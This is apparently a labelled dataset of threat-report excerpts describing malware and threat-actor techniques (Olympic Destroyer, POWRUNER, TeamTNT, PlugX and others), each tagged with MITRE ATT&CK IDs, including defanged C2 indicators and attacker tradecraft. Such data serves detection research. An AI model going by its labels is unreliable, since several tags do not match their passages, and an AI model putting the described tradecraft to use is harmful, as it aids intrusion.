{"text1":"The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning","labels":"['T1059.005']"}
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1016', 'T1119', 'T1587.001', 'T1078']"}
{"text1":"To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key","labels":"['T1106', 'T1543.003']"}
{"text1":"Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files.The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format:http:\/\/<attacker_controlled_domain\/>report.php","labels":"['T1071.001']"}
{"text1":"Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. 7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. 6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. 7] In 2020, ScreenConnect\/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware","labels":"['T1059.001']"}
{"text1":"Stage 1: A Master Boot Record\u00a0(MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine","labels":"['T1561.002']"}
{"text1":"The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques","labels":"['T1105']"}
{"text1":"BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware","labels":"['T1113']"}
{"text1":"As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so","labels":"['T1105', 'T1071.001']"}
{"text1":"Many fields in the installation program are forged into Acrobat Reader installation program, and the interface after running is related to Acrobat Reader","labels":"['T1036.005']"}
{"text1":"The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C","labels":"['T1059.003', 'T1218.010', 'T1059.001', 'T1140', 'T1547.009']"}
{"text1":"Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and use full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as \u201c.dat\u201d files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information","labels":"['T1105']"}
{"text1":"Execution through API (Batch file for example). - Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process. File and directory discovery: to search files to encrypt. Encrypt files. Create files","labels":"['T1486']"}
{"text1":"The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them","labels":"['T1132.001', 'T1573.001']"}
{"text1":"1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign","labels":"['T1027']"}
{"text1":"Implant Type \u2013 WaterBear is a stage-2 implant with many capabilities; BendyBear is a stage-0 downloader","labels":"['T1105']"}
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - \u25bc February (14) CannibalRAT targets Brazil Who Wasn\u2019t Responsible for Olympic Destroyer","labels":"['T1021.002']"}
{"text1":"SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c","labels":"['T1057', 'T1564.010']"}
{"text1":"POWRUNER may also receive batch commands from the C2 server to collect host information from the system","labels":"['T1083', 'T1057', 'T1047', 'T1049', 'T1016', 'T1082', 'T1033']"}
{"text1":"The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS","labels":"['T1071.001']"}
{"text1":"TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004","labels":"['T1204.003']"}
{"text1":"Crutch is able to bypass some security layers by abusing legitimate infrastructure \u2013 here Dropbox \u2013 in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators","labels":"['T1102.002']"}
{"text1":"Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly","labels":"['T1074.001', 'T1560']"}
{"text1":"Woburn, MA \u2013 May 7, 2018 \u2013 Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelg\u00e4nging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox","labels":"['T1027']"}
{"text1":"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony","labels":"['T1070.001']"}
{"text1":"The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module","labels":"['T1078.002']"}
{"text1":"We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active","labels":"['T1568']"}
{"text1":"Regarding to downloading and executing a tool, Flagpro stores the downloaded file in file path \u201c%Temp%\\~MY[0-9A-F].tmp\u201d first. Then, Flagpro adds extension \u201c.exe\u201d to the name of stored file and executes the file","labels":"['T1036']"}
{"text1":"Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns","labels":"['T1486']"}
{"text1":"In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response","labels":"['T1132.001']"}
{"text1":"Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts","labels":"['T1021.005', 'T1021.001', 'T1021.004']"}
{"text1":"The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server","labels":"['T1090.002']"}
{"text1":"This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script","labels":"['T1059.001']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated","labels":"['T1105']"}
{"text1":"The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid","labels":"['T1484.001', 'T1078.002']"}
{"text1":"AT&T Alien Labs\u2122 has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell\/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more","labels":"['T1547.001', 'T1059.003']"}
{"text1":"To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware","labels":"['T1588.002']"}
{"text1":"It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel\u00a0rootkit","labels":"['T1014']"}
{"text1":"Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script\u2019s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used","labels":"['T1057']"}
{"text1":"If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components","labels":"['T1569.002']"}
{"text1":"Network Reconnaissance \u2013 gathering information from machines on the network. Credential Theft \u2013 stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving \u2013 files are transferred to staging servers before exfiltration. Csvde \u2013 can be used to extract Active Directory files and data. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system","labels":"['T1074.002']"}
{"text1":"On balance,\u00a0the fall campaigns diverged from\u00a0Bulgarian themed\u00a0NetWire\u00a0campaigns in the\u00a0early\u00a0summer in\u00a0scope\u00a0and scale. These campaigns distributed\u00a0NetWire\u00a0variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through\u00a0certutils. The\u00a0NetWire\u00a0malware has been around since at least 2002 and has been consistently\u00a0in use by various actors across\u00a0the threat\u00a0landscape. This\u00a0analysis shows groupings of similar\u00a0campaigns distributing\u00a0NetWire\u00a0based on message attributes, email lures\u00a0and\u00a0language, Office document metadata, VBA Macro code, and malware configuration","labels":"['T1566.001', 'T1059.005']"}
{"text1":"This thread searches for for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds","labels":"['T1005', 'T1083', 'T1074.001', 'T1119', 'T1025']"}
{"text1":"Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection. We observed the use of two signers during our research, as shown below in Figure 1","labels":"['T1553.002']"}
{"text1":"The FTP account information used in the malware can expose the C&C server to attacks. The string \u2018victory\u2019 used in the password has also been found in the b374k webshell used by the Kimsuky group","labels":"['T1598.003', 'T1059.005', 'T1027']"}
{"text1":"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server","labels":"['T1071.001']"}
{"text1":"Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it","labels":"['T1053.005']"}
{"text1":"The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process","labels":"['T1055', 'T1055.002']"}
{"text1":"This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I\u2019m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I\u2019m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon\u2019s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows","labels":"['T1078.003']"}
{"text1":"2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start\/stop the mining based on CPU usage and whether the Activity Monitor process is running","labels":"['T1057']"}
{"text1":"It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker\u2019s own. This technique is not new; it has been used by other malware in the past \u2013 even the infamous BackSwap banking trojan implemented it in its earliest stages","labels":"['T1565.002']"}
{"text1":"The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters","labels":"['T1132.002']"}
{"text1":"In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector","labels":"['T1566.001']"}
{"text1":"It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps:\/\/s3[.]amazonaws[.]com\/doclibrarysales\/test[.]txt and then executes it","labels":"['T1583.006', 'T1102']"}
{"text1":"The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix","labels":"['T1059.005']"}
{"text1":"C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable\/disable decoy network traffic feature, and update the number range used by its PRNG","labels":"['T1059.003']"}
{"text1":"In order to meet the phishing emails\u2019 infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself","labels":"['T1566.002']"}
{"text1":"Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization","labels":"['T1204.002', 'T1047']"}
{"text1":"To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems","labels":"['T1569.002']"}
{"text1":"This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants","labels":"['T1074.001', 'T1025']"}
{"text1":"The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password","labels":"['T1205']"}
{"text1":"Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a \u201cRansomware-as-a-Service (RAAS) malware, so its distribution methods vary depending on the attacker distributing it","labels":"['T1566.001']"}
{"text1":"Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named \u201cinfo\u201d in \u201c%appdata%\\Micorosoft\\Templates\u201d and sends it to the C2","labels":"['T1082']"}
{"text1":"As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion","labels":"['T1029']"}
{"text1":"Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic","labels":"['T1560.001', 'T1074.001', 'T1074.002']"}
{"text1":"The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network","labels":"['T1566.001']"}
{"text1":"FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as","labels":"['T1059.003', 'T1059', 'T1218.011']"}
{"text1":"Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it\u2019s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections","labels":"['T1210']"}
{"text1":"We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here","labels":"['T1055.002']"}
{"text1":"The execution chain ensures that persistence is set on the affected system using a .lnk\u00a0file in the Startup directory. The .lnk\u00a0file shown in Figure 17 opens the malicious VBS dropped on the system","labels":"['T1547.001']"}
{"text1":"In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims\u2019 disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files","labels":"['T1485']"}
{"text1":"If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption","labels":"['T1095']"}
{"text1":"The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server","labels":"['T1071.001']"}
{"text1":"The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data","labels":"['T1560.002', 'T1573.001']"}
{"text1":"The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows","labels":"['T1036']"}
{"text1":"At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels","labels":"['T1135']"}
{"text1":"Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\\Microsoft\\ or %ProgramData%\\Microsoft\\ directories) and executed","labels":"['T1140']"}
{"text1":"The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack","labels":"['T1566.002']"}
{"text1":"Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code","labels":"['T1053.005', 'T1218.010', 'T1027']"}
{"text1":"Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain","labels":"['T1482', 'T1059.003']"}
{"text1":"The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot","labels":"['T1082']"}
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key\/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1012']"}
{"text1":"It also creates a folder in C:\\SDRSMLINK\\ and shares this folder with the rest of the network","labels":"['T1547.001', 'T1564.006']"}
{"text1":"In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP\/HTTPS\/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP\/HTTPS\/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1021.001']"}
{"text1":"We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however). It could be a blip \u2014 perhaps a one-off \u2014 but it's still notable","labels":"['T1553.002']"}
{"text1":"Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of","labels":"['T1548.002']"}
{"text1":"Most of the infected sites use the TYPO3 CMS (see: https:\/\/typo3.org\/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform","labels":"['T1071.001']"}
{"text1":"In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known \u2018PlugX\u2019 or \u2018HttpBrowser\u2019 RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups","labels":"['T1027']"}
{"text1":"Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam","labels":"['T1070.004']"}
{"text1":"A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user\u2019s AppData\\Local\\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key","labels":"['T1547.001']"}
{"text1":"And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time","labels":"['T1070.004']"}
{"text1":"mailsearcher32 module This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users","labels":"['T1083', 'T1087.003']"}
{"text1":"Otherwise, it will add the binary\u2019s path to the Software\\Microsoft\\Windows\\CurrentVersion\\Run key with \u2014Update as a parameter","labels":"['T1547.001']"}
{"text1":"Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz","labels":"['T1550.003']"}
{"text1":"The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We\u2019ve waxed lyrical about crontabs before, but we haven\u2019t explored XDG Autostart Entries in detail","labels":"['T1547.013']"}
{"text1":"browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird","labels":"['T1555.003', 'T1087.003']"}
{"text1":"After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal","labels":"['T1547.001']"}
{"text1":"H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader\/dropper, and self-propagation\/lateral movement techniques used by this variant.1,2","labels":"['T1027']"}
{"text1":"Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2","labels":"['T1036.005', 'T1036']"}
{"text1":"RAR archiving \u2013 files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors","labels":"['T1560.001']"}
{"text1":"In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims\u2019 machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016","labels":"['T1555.003']"}
